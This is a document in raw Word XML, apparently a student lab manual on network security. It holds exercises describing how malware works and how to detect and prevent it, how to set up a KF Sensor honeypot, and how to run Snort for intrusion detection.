      </w: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726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4B4847" w:rsidRPr="000122D3" w:rsidRDefault="004B4847" w:rsidP="004B48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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex.No. 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="000122D3" w:rsidRDefault="004B4847" w:rsidP="004B48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Understanding Malware working principles, detection and prevention</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="000122D3" w:rsidRDefault="004B4847" w:rsidP="004B48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0122D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Aim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="000122D3" w:rsidRDefault="004B4847" w:rsidP="004B484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0122D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To perform study on Malware working principles, detection and prevention.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="000122D3" w:rsidRDefault="004B4847" w:rsidP="004B48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0122D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Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="004B4847" w:rsidRDefault="004B4847" w:rsidP="004B48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Malware is a software that is intended to damage or disable computers and computer systems without owner’s knowledge. Malware is a shortened term for “malicious software”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Working Principle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="000122D3" w:rsidRDefault="004B4847" w:rsidP="004B4847">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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Self-replication in different parts of the file system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B4847">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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Installing applications that capture keystrokes or commandeer system resources, often running without the user being aware, while slowing the system down considerably</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B4847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Blocking access to files, programs or even the system itself, sometimes forcing the user to make a payment to regain access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B4847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Bombarding a browser or desktop with ads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="000122D3" w:rsidRDefault="004B4847" w:rsidP="004B4847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Breaking essential system components and rendering a device inoperable</w:t>
      </w:r>
      <w:r w:rsidRPr="000122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847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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D</w:t>
      </w:r>
      <w:r w:rsidRPr="000122D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etection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B484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Detection controls should identify the presence of malware, alert the user, and in the best-case scenario stop malware from carrying out its mission.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Detection controls include the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B4847">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="8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Real-time firewall detection of suspicious file downloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B4847">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="8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Real-time firewall detection of suspicious network connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B4847">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="8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Host and network-based intrusion detection systems of intrusion prevention systems (IDS/IPS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="00827709" w:rsidP="004B4847">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="8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4B4847" w:rsidRPr="000122D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Review and analysis of firewalls, IDS, operating systems, and application logs for indicators of compromise</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004B4847"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:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B4847">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="8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User awareness to recognize and report suspicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B4847">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="87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Help desk (or equivalent) training to respond to malware incidents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003266E6" w:rsidRDefault="003266E6" w:rsidP="004B48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3266E6" w:rsidRDefault="003266E6" w:rsidP="004B48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3266E6" w:rsidRDefault="003266E6" w:rsidP="004B48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4B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Impact the distribution channel by training users </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="000122D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not to click links</w:t>
        </w:r>
      </w:hyperlink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embedded in email, open unexpected email attachments, irresponsibly surf the Web, download games or music, participate in peer-to-peer (P2P) networks, and allow remove access to their desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Configure the firewall to restrict access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Do not allow users to install software on company-provided devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Do not allow users to make changes to configuration settings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Do not allow users to have administrative rights to their workstations. Malware runs tin the security context of the logged-in user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Do not allow users to disable (even temporarily) anti-malware software and controls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Disable remote desktop connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Apply operating system and application security patches expediently.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B48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Enable browser-based controls, including pop-up blocking, download screening, and automatic updates.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="000122D3" w:rsidRDefault="004B4847" w:rsidP="004B48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Implement an enterprise-wide antivirus / anti-malware application. It is important that the anti-malware solutions be configured to update as frequently as possible because many new pieces of malicious code are released daily.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="000122D3" w:rsidRDefault="004B4847" w:rsidP="004B484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0122D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Result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4847" w:rsidRPr="00AB47E4" w:rsidRDefault="004B4847" w:rsidP="004B484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Thus malware working principle, detection and prevention has been studied.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000122D3" w:rsidRPr="000122D3" w:rsidRDefault="000122D3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122D3" w:rsidRPr="000122D3" w:rsidRDefault="000122D3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3266E6" w:rsidRDefault="003266E6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004BD" w:rsidRPr="000122D3" w:rsidRDefault="00F004BD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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex.No. 11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F004BD" w:rsidRPr="000122D3" w:rsidRDefault="00F004BD" w:rsidP="00F004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Setup honeypot and monitor the honeypot network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B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8103CF" w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>im</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B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Honey Pot is a device placed on Computer Network specifically designed to capture malicious network traffic. KF Sensor is the tool to setup as honeypot when KF Sensor is running it places a siren icon in the windows system tray in the bottom right of the screen. If there are no alerts then green icon is displayed. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="008103CF" w:rsidP="00836B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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B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A honeypot is a computer system that is set up to act as a decoy to lure cyber attackers, and to detect, deflect or study attempts to gain unauthorized access to information systems. All communications with a honeypot are considered hostile, as there's no reason for legitimate users to access a honeypot. Viewing and logging this activity can provide an insight into the level and types of threat a network infrastructure faces while distracting attackers away from assets of real value. Honeypots can be classified based on their deployment (use/action) and based on their level of involvement. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B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1. Production honeypots </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B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2. Research honeypots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KF S</w:t>
      </w:r>
      <w:r w:rsidR="006B0F9F" w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ensor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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KF</w:t>
      </w:r>
      <w:r w:rsidR="00B80BE0" w:rsidRPr="00012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Sensor is a Windows based honeypot Intrusion Detection System (IDS). It acts as a honeypot to attract and detect hackers and worms by simulating vulnerable system services and </w:t>
      </w:r>
      <w:r w:rsidR="00B80BE0" w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trojans</w:t>
      </w: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36B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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KFSensor is a system installed in a network in order to divert and study an attacker’s behavior. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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The main feature of KFSensor is that every connection it receives is a suspect hence it results in very few false alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B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B80BE0" w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rocedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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Download KF Sensor Evaluation Setup File from KF Sensor Website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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Install with License Agreement and appropriate directory path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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Reboot the Computer now. The KF Sensor automatically starts during windows boot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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Click Next to setup wizard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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Select all port classes to include and Click Next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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“Send the email and Send from email”, enter the ID and Click Next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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lastRenderedPageBreak/>
        <w:t>Select the options such as Denial of Service[DOS], Port Activity, Proxy Emulsion, Network Port Analyzer, Click Next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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Select Install as System service and Click Next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836B25" w:rsidRPr="00AB47E4" w:rsidRDefault="00836B25" w:rsidP="00836B25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Click finish. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00551E35" w:rsidRPr="00A962C0" w:rsidRDefault="00A962C0" w:rsidP="00836B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5252720" cy="2366645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F Senso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643" cy="2368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020" w:rsidRPr="000122D3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3A6824" w:rsidRPr="000122D3" w:rsidRDefault="00A962C0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22D3"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margin">
              <wp:posOffset>-36344</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2653964</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5253990" cy="2868295"/>
            <wp:effectExtent l="0" t="0" r="381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F Sensor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2C0" w:rsidRDefault="00A962C0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962C0" w:rsidRDefault="00A962C0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962C0" w:rsidRDefault="00A962C0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962C0" w:rsidRDefault="00A962C0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962C0" w:rsidRDefault="00A962C0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962C0" w:rsidRDefault="00A962C0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962C0" w:rsidRDefault="00A962C0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962C0" w:rsidRDefault="00A962C0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962C0" w:rsidRDefault="00A962C0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962C0" w:rsidRDefault="00A962C0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3A6824" w:rsidRPr="001C0C50" w:rsidRDefault="003A6824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0C50"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:rsidR="003A6824" w:rsidRPr="001C0C50" w:rsidRDefault="006502D2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0C50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Thus </w:t>
      </w:r>
      <w:r w:rsidR="009C6071" w:rsidRPr="001C0C50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>honeypot setup and monitoring of honeypot network has been implemented successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F004BD" w:rsidRPr="000122D3" w:rsidRDefault="00F004BD" w:rsidP="00F004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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex.No. 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F004BD" w:rsidRPr="000122D3" w:rsidRDefault="003404A8" w:rsidP="00F004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Demonstrate Intrusion Detection system using any tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB340B" w:rsidRPr="000122D3" w:rsidRDefault="00FB340B" w:rsidP="005D4D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:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00FB340B" w:rsidP="00334A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>To work with SNORT tool to implement the intrusion detection systm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB340B" w:rsidRPr="000122D3" w:rsidRDefault="00FB340B" w:rsidP="00334A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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SNORT Tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00334A2E" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Snort is an open source network intrusion detection system (NIDS) and it is a packet sniffer that monitors network traffic in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00334A2E" w:rsidP="00334A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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Intrusion Detection System</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Intrusion detection is a set of techniques and methods that are used to detect suspicious activity both at the network and host level. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Intrusion detection systems fall into two basic categories: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A2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Signature-based intrusion detection systems </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A2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>Anomaly detection systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Snort is primarily a rule-based IDS, however input plug-ins a</w:t>
      </w:r>
      <w:r w:rsidR="00334A2E" w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">re present to detect anomalies </w:t>
      </w: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in protocol headers. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Snort is based on libpcap (for library packet capture), a tool that is widely used in TCP</w:t>
      </w:r>
      <w:r w:rsidR="00B069E4" w:rsidRPr="00012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47E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00B069E4" w:rsidRPr="00012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47E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPtraffic sniffers and analyzers. When suspicious behavior is detected, Snort sends a real-time alert to syslog, a separate 'alerts' file, or to a</w:t>
      </w:r>
      <w:r w:rsidR="00B069E4" w:rsidRPr="00012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pop-up window. Snort is currently the most popular free network intrusion detection software. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A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 SNORT can be configured to run in three modes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00B069E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Sniffer mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00B069E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Packet Logger mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00B069E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Network Intrusion Detection System mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A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1. Sniffer mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Snort –v Print out the TCP/IP packets header on the screen </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Snort –vd show the TCP/IP ICMP header with application data in transmit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A2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2. Packet Logger mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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snort –dev –l c:\log [create this directory in the C drive] and snort will automatically know to go into packet logger mode, it collects every packet it sees and places it in log directory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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snort –dev –l c:\log –h ipaddress/24:This rule tells snort that you want to print out the data link and TCP/IP headers as well as application data into the log directory. snort –l c:\log –b This is binary mode logs everything into a single file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A2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3. Network Intrusion Detection System mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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 xml:space="preserve">snort –d c:\log –h ipaddress/24 –c snort.conf This is a configuration file applies rule to each packet to decide it an action based upon the rule type in the file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00AB47E4" w:rsidP="00334A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Snort –d –h ipaddress/24 –l c:\log –c snort.conf This will cnfigure snort to run in its most basic NIDS form, logging packets that trigger rules specifies in the snort.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="00AB47E4" w:rsidRDefault="00B069E4" w:rsidP="00334A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</w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Sniffer mode snort –v Print out the TCP/IP packets header on the screen. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Snort –vd Show the TCP/IP ICMP header with application data in transit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Packet Logger mode snort –dev –l c:\log [create this directory in the C drive] and snort will automatically know to go into packet logger mode, it collects every packet it sees and places it in log directory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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snort –dev –l c:\log –h ipaddress/24 This rule tells snort that you want to print out the data link and TCP/IP headers as well as application data into the log directory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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snort –l c:\log –b this binary mode logs everything into a single file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Network Intrusion Detection System mode snort –d c:\log –h ipaddress/24 –c snort.conf This is a configuration file that applies rule to each packet to decide it an action based upon the rule type in the file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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snort –d –h ip address/24 –l c:\log –c snort.conf This will configure snort to run in its most basic NIDS form, logging packets that trigger rules specifies in the snort.conf. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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>Download SNORT from snort.org. Install snort with or without database support.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Select all the components and Click Next. Install and Close. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Skip the WinPcap driver installation. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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Add the path variable in windows environment variable by selecting new classpath. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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 xml:space="preserve">Create a path variable and point it at snort.exe variable name path and variable value c:\snort\bin. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB47E4" w:rsidRPr="000122D3" w:rsidRDefault="00AB47E4" w:rsidP="00334A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2D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Click OK button and then close all dialog boxes. Open command prompt and type the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E03838" w:rsidRPr="000122D3" w:rsidRDefault="000D35F1" w:rsidP="008C06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22D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4396826</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="30543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ort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2D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943600" cy="40030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ort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56" cy="4006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6B1" w:rsidRPr="000122D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8C06B1" w:rsidRPr="000122D3" w:rsidRDefault="00BF534B" w:rsidP="008C06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22D3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BF534B" w:rsidRPr="000122D3" w:rsidRDefault="00BF534B" w:rsidP="008C06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122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Thus intrusion detection using SNORT tool has been implemented successfully.</w:t>
      </w:r>
    </w:p>
